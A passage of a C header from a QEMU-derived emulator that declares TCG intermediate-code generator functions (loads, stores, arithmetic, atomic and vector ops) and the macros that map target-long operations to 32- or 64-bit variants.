TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2), TCGV_HIGH(tcg_ctx, arg2)); } void tcg_gen_discard_i64(TCGContext *tcg_ctx, TCGv_i64 arg); void tcg_gen_mov_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_movi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, int64_t arg); void tcg_gen_ld8u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_ld8s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_ld16u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_ld16s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_ld32u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_ld32s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_ld_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_st_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_and_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_or_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_xor_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_shl_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_shr_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_sar_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_mul_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); #endif /* TCG_TARGET_REG_BITS */ static inline void tcg_gen_neg_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { if (TCG_TARGET_HAS_neg_i64) { tcg_gen_op2_i64(tcg_ctx, INDEX_op_neg_i64, ret, arg); } else { tcg_gen_subfi_i64(tcg_ctx, ret, 0, arg); } } /* Size changing operations. */ void tcg_gen_extu_i32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i32 arg); void tcg_gen_ext_i32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i32 arg); void tcg_gen_concat_i32_i64(TCGContext *tcg_ctx, TCGv_i64 dest, TCGv_i32 low, TCGv_i32 high); void tcg_gen_extrl_i64_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i64 arg); void tcg_gen_extrh_i64_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i64 arg); void tcg_gen_extr_i64_i32(TCGContext *tcg_ctx, TCGv_i32 lo, TCGv_i32 hi, TCGv_i64 arg); void tcg_gen_extr32_i64(TCGContext *tcg_ctx, TCGv_i64 lo, TCGv_i64 hi, TCGv_i64 arg); static inline void tcg_gen_concat32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 lo, TCGv_i64 hi) { tcg_gen_deposit_i64(tcg_ctx, ret, lo, hi, 32, 32); } /* QEMU specific operations. */ #ifndef TARGET_LONG_BITS #error must include QEMU headers #endif #if TARGET_INSN_START_WORDS == 1 # if TARGET_LONG_BITS <= TCG_TARGET_REG_BITS static inline void tcg_gen_insn_start(TCGContext *tcg_ctx, target_ulong pc) { tcg_gen_op1(tcg_ctx, INDEX_op_insn_start, pc); } # else static inline void tcg_gen_insn_start(TCGContext *tcg_ctx, target_ulong pc) { tcg_gen_op2(tcg_ctx, INDEX_op_insn_start, (uint32_t)pc, (uint32_t)(pc >> 32)); } # endif #elif TARGET_INSN_START_WORDS == 2 # if TARGET_LONG_BITS <= TCG_TARGET_REG_BITS static inline void tcg_gen_insn_start(TCGContext *tcg_ctx, target_ulong pc, target_ulong a1) { tcg_gen_op2(tcg_ctx, INDEX_op_insn_start, pc, a1); } # else static inline void tcg_gen_insn_start(TCGContext *tcg_ctx, target_ulong pc, target_ulong a1) { tcg_gen_op4(tcg_ctx, INDEX_op_insn_start, (uint32_t)pc, (uint32_t)(pc >> 32), (uint32_t)a1, (uint32_t)(a1 >> 32)); } # endif #elif TARGET_INSN_START_WORDS == 3 # if TARGET_LONG_BITS <= TCG_TARGET_REG_BITS static inline void tcg_gen_insn_start(TCGContext *tcg_ctx, target_ulong pc, target_ulong a1, target_ulong a2) { tcg_gen_op3(tcg_ctx, INDEX_op_insn_start, pc, a1, a2); } # else static inline void tcg_gen_insn_start(TCGContext *tcg_ctx, target_ulong pc, target_ulong a1, target_ulong a2) { tcg_gen_op6(tcg_ctx, INDEX_op_insn_start, (uint32_t)pc, (uint32_t)(pc >> 32), (uint32_t)a1, (uint32_t)(a1 >> 32), (uint32_t)a2, (uint32_t)(a2 >> 32)); } # endif #else # error "Unhandled number of operands to insn_start" #endif /** * tcg_gen_exit_tb() - output exit_tb TCG operation * @tb: The TranslationBlock from which we are exiting * @idx: Direct jump slot index, or exit request * * See tcg/README for more info about this TCG operation. * See also tcg.h and the block comment above TB_EXIT_MASK. * * For a normal exit from the TB, back to the main loop, @tb should * be NULL and @idx should be 0. Otherwise, @tb should be valid and * @idx should be one of the TB_EXIT_ values. */ void tcg_gen_exit_tb(TCGContext *tcg_ctx, TranslationBlock *tb, unsigned idx); /** * tcg_gen_goto_tb() - output goto_tb TCG operation * @idx: Direct jump slot index (0 or 1) * * See tcg/README for more info about this TCG operation. * * NOTE: In softmmu emulation, direct jumps with goto_tb are only safe within * the pages this TB resides in because we don't take care of direct jumps when * address mapping changes, e.g. in tlb_flush(). In user mode, there's only a * static address translation, so the destination address is always valid, TBs * are always invalidated properly, and direct jumps are reset when mapping * changes. */ void tcg_gen_goto_tb(TCGContext *tcg_ctx, unsigned idx); /** * tcg_gen_lookup_and_goto_ptr() - look up the current TB, jump to it if valid * @addr: Guest address of the target TB * * If the TB is not valid, jump to the epilogue. * * This operation is optional. If the TCG backend does not implement goto_ptr, * this op is equivalent to calling tcg_gen_exit_tb() with 0 as the argument. */ void tcg_gen_lookup_and_goto_ptr(TCGContext *tcg_ctx); #if TARGET_LONG_BITS == 32 #define tcg_temp_new tcg_temp_new_i32 #define tcg_global_reg_new tcg_global_reg_new_i32 #define tcg_global_mem_new tcg_global_mem_new_i32 #define tcg_temp_local_new tcg_temp_local_new_i32 #define tcg_temp_free tcg_temp_free_i32 #define tcg_gen_qemu_ld_tl tcg_gen_qemu_ld_i32 #define tcg_gen_qemu_st_tl tcg_gen_qemu_st_i32 #else #define tcg_temp_new tcg_temp_new_i64 #define tcg_global_reg_new tcg_global_reg_new_i64 #define tcg_global_mem_new tcg_global_mem_new_i64 #define tcg_temp_local_new tcg_temp_local_new_i64 #define tcg_temp_free tcg_temp_free_i64 #define tcg_gen_qemu_ld_tl tcg_gen_qemu_ld_i64 #define tcg_gen_qemu_st_tl tcg_gen_qemu_st_i64 #endif void tcg_gen_qemu_ld_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGArg, MemOp); void tcg_gen_qemu_st_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGArg, MemOp); void tcg_gen_qemu_ld_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGArg, MemOp); void tcg_gen_qemu_st_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGArg, MemOp); static inline void tcg_gen_qemu_ld8u(TCGContext *tcg_ctx, TCGv ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_tl(tcg_ctx, ret, addr, mem_index, MO_UB); } static inline void tcg_gen_qemu_ld8s(TCGContext *tcg_ctx, TCGv ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_tl(tcg_ctx, ret, addr, mem_index, MO_SB); } static inline void tcg_gen_qemu_ld16u(TCGContext *tcg_ctx, TCGv ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_tl(tcg_ctx, ret, addr, mem_index, MO_TEUW); } static inline void tcg_gen_qemu_ld16s(TCGContext *tcg_ctx, TCGv ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_tl(tcg_ctx, ret, addr, mem_index, MO_TESW); } static inline void tcg_gen_qemu_ld32u(TCGContext *tcg_ctx, TCGv ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_tl(tcg_ctx, ret, addr, mem_index, MO_TEUL); } static inline void tcg_gen_qemu_ld32s(TCGContext *tcg_ctx, TCGv ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_tl(tcg_ctx, ret, addr, mem_index, MO_TESL); } static inline void tcg_gen_qemu_ld64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_i64(tcg_ctx, ret, addr, mem_index, MO_TEQ); } static inline void tcg_gen_qemu_st8(TCGContext *tcg_ctx, TCGv arg, TCGv addr, int mem_index) { tcg_gen_qemu_st_tl(tcg_ctx, arg, addr, mem_index, MO_UB); } static inline void tcg_gen_qemu_st16(TCGContext *tcg_ctx, TCGv arg, TCGv addr, int mem_index) { tcg_gen_qemu_st_tl(tcg_ctx, arg, addr, mem_index, MO_TEUW); } static inline void tcg_gen_qemu_st32(TCGContext *tcg_ctx, TCGv arg, TCGv addr, int mem_index) { tcg_gen_qemu_st_tl(tcg_ctx, arg, addr, mem_index, MO_TEUL); } static inline void tcg_gen_qemu_st64(TCGContext *tcg_ctx, TCGv_i64 arg, TCGv addr, int mem_index) { tcg_gen_qemu_st_i64(tcg_ctx, arg, addr, mem_index, MO_TEQ); } void tcg_gen_atomic_cmpxchg_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_cmpxchg_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_xchg_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_xchg_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_add_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_add_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_and_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_and_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_or_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_or_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_xor_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_xor_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_smin_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_smin_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_umin_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_umin_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_smax_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_smax_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_umax_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_umax_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_add_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_add_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_and_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_and_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_or_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_or_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_xor_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_xor_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_smin_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_smin_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_umin_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_umin_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_smax_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_smax_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_umax_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_umax_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_mov_vec(TCGContext *tcg_ctx, TCGv_vec, TCGv_vec); void tcg_gen_dup_i32_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec, TCGv_i32); void tcg_gen_dup_i64_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec, TCGv_i64); void tcg_gen_dup_mem_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec, TCGv_ptr, tcg_target_long); void tcg_gen_dup8i_vec(TCGContext *tcg_ctx, TCGv_vec, uint32_t); void tcg_gen_dup16i_vec(TCGContext *tcg_ctx, TCGv_vec, uint32_t); void tcg_gen_dup32i_vec(TCGContext *tcg_ctx, TCGv_vec, uint32_t); void tcg_gen_dup64i_vec(TCGContext *tcg_ctx, TCGv_vec, uint64_t); void tcg_gen_dupi_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec, uint64_t); void tcg_gen_add_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_sub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_mul_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_and_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_or_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_xor_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_andc_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_orc_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_nand_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_nor_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_eqv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_not_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a); void tcg_gen_neg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a); void tcg_gen_abs_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a); void tcg_gen_ssadd_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_usadd_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_sssub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_ussub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_smin_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_umin_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_smax_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_umax_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_shli_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i); void tcg_gen_shri_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i); void tcg_gen_sari_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i); void tcg_gen_shls_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 s); void tcg_gen_shrs_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 s); void tcg_gen_sars_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 s); void tcg_gen_shlv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec s); void tcg_gen_shrv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec s); void tcg_gen_sarv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec s); void tcg_gen_cmp_vec(TCGContext *tcg_ctx, TCGCond cond, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_bitsel_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGv_vec c); void tcg_gen_cmpsel_vec(TCGContext *tcg_ctx, TCGCond cond, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGv_vec c, TCGv_vec d); void tcg_gen_ld_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_ptr base, TCGArg offset); void tcg_gen_st_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_ptr base, TCGArg offset); void tcg_gen_stl_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_ptr base, TCGArg offset, TCGType t); #if TARGET_LONG_BITS == 64 #define tcg_gen_movi_tl tcg_gen_movi_i64 #define tcg_gen_mov_tl tcg_gen_mov_i64 #define tcg_gen_ld8u_tl tcg_gen_ld8u_i64 #define tcg_gen_ld8s_tl tcg_gen_ld8s_i64 #define tcg_gen_ld16u_tl tcg_gen_ld16u_i64 #define tcg_gen_ld16s_tl tcg_gen_ld16s_i64 #define tcg_gen_ld32u_tl tcg_gen_ld32u_i64 #define tcg_gen_ld32s_tl tcg_gen_ld32s_i64 #define tcg_gen_ld_tl tcg_gen_ld_i64 #define tcg_gen_st8_tl tcg_gen_st8_i64 #define tcg_gen_st16_tl tcg_gen_st16_i64 #define tcg_gen_st32_tl tcg_gen_st32_i64 #define tcg_gen_st_tl tcg_gen_st_i64 #define tcg_gen_add_tl tcg_gen_add_i64 #define tcg_gen_addi_tl tcg_gen_addi_i64 #define tcg_gen_sub_tl tcg_gen_sub_i64 #define tcg_gen_neg_tl tcg_gen_neg_i64 #define tcg_gen_abs_tl tcg_gen_abs_i64 #define tcg_gen_subfi_tl tcg_gen_subfi_i64 #define tcg_gen_subi_tl tcg_gen_subi_i64 #define tcg_gen_and_tl tcg_gen_and_i64 #define tcg_gen_andi_tl tcg_gen_andi_i64 #define tcg_gen_or_tl tcg_gen_or_i64 #define tcg_gen_ori_tl tcg_gen_ori_i64 #define tcg_gen_xor_tl tcg_gen_xor_i64 #define tcg_gen_xori_tl tcg_gen_xori_i64 #define tcg_gen_not_tl tcg_gen_not_i64 #define tcg_gen_shl_tl tcg_gen_shl_i64 #define tcg_gen_shli_tl tcg_gen_shli_i64 #define tcg_gen_shr_tl tcg_gen_shr_i64 #define tcg_gen_shri_tl tcg_gen_shri_i64 #define tcg_gen_sar_tl tcg_gen_sar_i64 #define tcg_gen_sari_tl tcg_gen_sari_i64 #define tcg_gen_brcond_tl tcg_gen_brcond_i64 #define tcg_gen_brcondi_tl tcg_gen_brcondi_i64 #define tcg_gen_setcond_tl tcg_gen_setcond_i64 #define tcg_gen_setcondi_tl tcg_gen_setcondi_i64 #define tcg_gen_mul_tl tcg_gen_mul_i64 #define tcg_gen_muli_tl tcg_gen_muli_i64 #define tcg_gen_div_tl tcg_gen_div_i64 #define tcg_gen_rem_tl tcg_gen_rem_i64 #define tcg_gen_divu_tl tcg_gen_divu_i64 #define tcg_gen_remu_tl tcg_gen_remu_i64 #define tcg_gen_discard_tl tcg_gen_discard_i64 #define tcg_gen_trunc_tl_i32 tcg_gen_extrl_i64_i32 #define tcg_gen_trunc_i64_tl tcg_gen_mov_i64 #define tcg_gen_extu_i32_tl tcg_gen_extu_i32_i64 #define tcg_gen_ext_i32_tl tcg_gen_ext_i32_i64 #define tcg_gen_extu_tl_i64 tcg_gen_mov_i64 #define tcg_gen_ext_tl_i64 tcg_gen_mov_i64 #define tcg_gen_ext8u_tl tcg_gen_ext8u_i64 #define tcg_gen_ext8s_tl tcg_gen_ext8s_i64 #define tcg_gen_ext16u_tl tcg_gen_ext16u_i64 #define tcg_gen_ext16s_tl tcg_gen_ext16s_i64 #define tcg_gen_ext32u_tl tcg_gen_ext32u_i64 #define tcg_gen_ext32s_tl tcg_gen_ext32s_i64 #define tcg_gen_bswap16_tl tcg_gen_bswap16_i64 #define tcg_gen_bswap32_tl tcg_gen_bswap32_i64 #define tcg_gen_bswap64_tl tcg_gen_bswap64_i64 #define tcg_gen_concat_tl_i64 tcg_gen_concat32_i64 #define tcg_gen_extr_i64_tl tcg_gen_extr32_i64 #define tcg_gen_andc_tl tcg_gen_andc_i64 #define tcg_gen_eqv_tl tcg_gen_eqv_i64 #define tcg_gen_nand_tl tcg_gen_nand_i64 #define tcg_gen_nor_tl tcg_gen_nor_i64 #define tcg_gen_orc_tl tcg_gen_orc_i64 #define tcg_gen_clz_tl tcg_gen_clz_i64 #define tcg_gen_ctz_tl tcg_gen_ctz_i64 #define tcg_gen_clzi_tl tcg_gen_clzi_i64 #define tcg_gen_ctzi_tl tcg_gen_ctzi_i64 #define tcg_gen_clrsb_tl tcg_gen_clrsb_i64 #define tcg_gen_ctpop_tl tcg_gen_ctpop_i64 #define tcg_gen_rotl_tl tcg_gen_rotl_i64 #define tcg_gen_rotli_tl tcg_gen_rotli_i64 #define tcg_gen_rotr_tl tcg_gen_rotr_i64 #define tcg_gen_rotri_tl tcg_gen_rotri_i64 #define tcg_gen_deposit_tl tcg_gen_deposit_i64 #define tcg_gen_deposit_z_tl tcg_gen_deposit_z_i64 #define tcg_gen_extract_tl tcg_gen_extract_i64 #define tcg_gen_sextract_tl tcg_gen_sextract_i64 #define tcg_gen_extract2_tl tcg_gen_extract2_i64 #define tcg_const_tl tcg_const_i64 #define tcg_const_local_tl tcg_const_local_i64 #define tcg_gen_movcond_tl tcg_gen_movcond_i64 #define tcg_gen_add2_tl tcg_gen_add2_i64 #define tcg_gen_sub2_tl tcg_gen_sub2_i64 #define tcg_gen_mulu2_tl tcg_gen_mulu2_i64 #define tcg_gen_muls2_tl tcg_gen_muls2_i64 #define tcg_gen_mulsu2_tl tcg_gen_mulsu2_i64 #define tcg_gen_smin_tl tcg_gen_smin_i64 #define tcg_gen_umin_tl tcg_gen_umin_i64 #define tcg_gen_smax_tl tcg_gen_smax_i64 #define tcg_gen_umax_tl tcg_gen_umax_i64 #define tcg_gen_atomic_cmpxchg_tl tcg_gen_atomic_cmpxchg_i64 #define tcg_gen_atomic_xchg_tl tcg_gen_atomic_xchg_i64 #define tcg_gen_atomic_fetch_add_tl tcg_gen_atomic_fetch_add_i64 #define tcg_gen_atomic_fetch_and_tl tcg_gen_atomic_fetch_and_i64 #define tcg_gen_atomic_fetch_or_tl tcg_gen_atomic_fetch_or_i64 #define tcg_gen_atomic_fetch_xor_tl tcg_gen_atomic_fetch_xor_i64 #define tcg_gen_atomic_fetch_smin_tl tcg_gen_atomic_fetch_smin_i64 #define tcg_gen_atomic_fetch_umin_tl tcg_gen_atomic_fetch_umin_i64 #define tcg_gen_atomic_fetch_smax_tl tcg_gen_atomic_fetch_smax_i64 #define tcg_gen_atomic_fetch_umax_tl tcg_gen_atomic_fetch_umax_i64 #define tcg_gen_atomic_add_fetch_tl tcg_gen_atomic_add_fetch_i64 #define tcg_gen_atomic_and_fetch_tl tcg_gen_atomic_and_fetch_i64 #define tcg_gen_atomic_or_fetch_tl tcg_gen_atomic_or_fetch_i64 #define tcg_gen_atomic_xor_fetch_tl tcg_gen_atomic_xor_fetch_i64 #define tcg_gen_atomic_smin_fetch_tl tcg_gen_atomic_smin_fetch_i64 #define tcg_gen_atomic_umin_fetch_tl tcg_gen_atomic_umin_fetch_i64 #define tcg_gen_atomic_smax_fetch_tl tcg_gen_atomic_smax_fetch_i64 #define tcg_gen_atomic_umax_fetch_tl tcg_gen_atomic_umax_fetch_i64 #define tcg_gen_dup_tl_vec tcg_gen_dup_i64_vec #else #define tcg_gen_movi_tl tcg_gen_movi_i32 #define tcg_gen_mov_tl tcg_gen_mov_i32 #define tcg_gen_ld8u_tl tcg_gen_ld8u_i32 #define tcg_gen_ld8s_tl tcg_gen_ld8s_i32 #define tcg_gen_ld16u_tl tcg_gen_ld16u_i32 #define tcg_gen_ld16s_tl tcg_gen_ld16s_i32 #define tcg_gen_ld32u_tl tcg_gen_ld_i32 #define tcg_gen_ld32s_tl tcg_gen_ld_i32 #define tcg_gen_ld_tl tcg_gen_ld_i32 #define tcg_gen_st8_tl tcg_gen_st8_i32 #define tcg_gen_st16_tl tcg_gen_st16_i32 #define tcg_gen_st32_tl tcg_gen_st_i32 #define tcg_gen_st_tl tcg_gen_st_i32 #define tcg_gen_add_tl tcg_gen_add_i32 #define tcg_gen_addi_tl tcg_gen_addi_i32 #define tcg_gen_sub_tl tcg_gen_sub_i32 #define tcg_gen_neg_tl tcg_gen_neg_i32 #define tcg_gen_abs_tl tcg_gen_abs_i32 #define tcg_gen_subfi_tl tcg_gen_subfi_i32 #define tcg_gen_subi_tl tcg_gen_subi_i32 #define tcg_gen_and_tl tcg_gen_and_i32 #define tcg_gen_andi_tl tcg_gen_andi_i32 #define tcg_gen_or_tl tcg_gen_or_i32 #define tcg_gen_ori_tl tcg_gen_ori_i32 #define tcg_gen_xor_tl tcg_gen_xor_i32 #define tcg_gen_xori_tl tcg_gen_xori_i32 #define tcg_gen_not_tl tcg_gen_not_i32 #define tcg_gen_shl_tl tcg_gen_shl_i32 #define tcg_gen_shli_tl tcg_gen_shli_i32 #define tcg_gen_shr_tl tcg_gen_shr_i32 #define tcg_gen_shri_tl tcg_gen_shri_i32 #define tcg_gen_sar_tl tcg_gen_sar_i32 #define tcg_gen_sari_tl tcg_gen_sari_i32 #define tcg_gen_brcond_tl tcg_gen_brcond_i32 #define tcg_gen_brcondi_tl tcg_gen_brcondi_i32 #define tcg_gen_setcond_tl tcg_gen_setcond_i32 #define tcg_gen_setcondi_tl tcg_gen_setcondi_i32 #define tcg_gen_mul_tl tcg_gen_mul_i32 #define tcg_gen_muli_tl tcg_gen_muli_i32 #define tcg_gen_div_tl tcg_gen_div_i32 #define tcg_gen_rem_tl tcg_gen_rem_i32 #define tcg_gen_divu_tl tcg_gen_divu_i32 #define tcg_gen_remu_tl tcg_gen_remu_i32 #define tcg_gen_discard_tl tcg_gen_discard_i32 #define 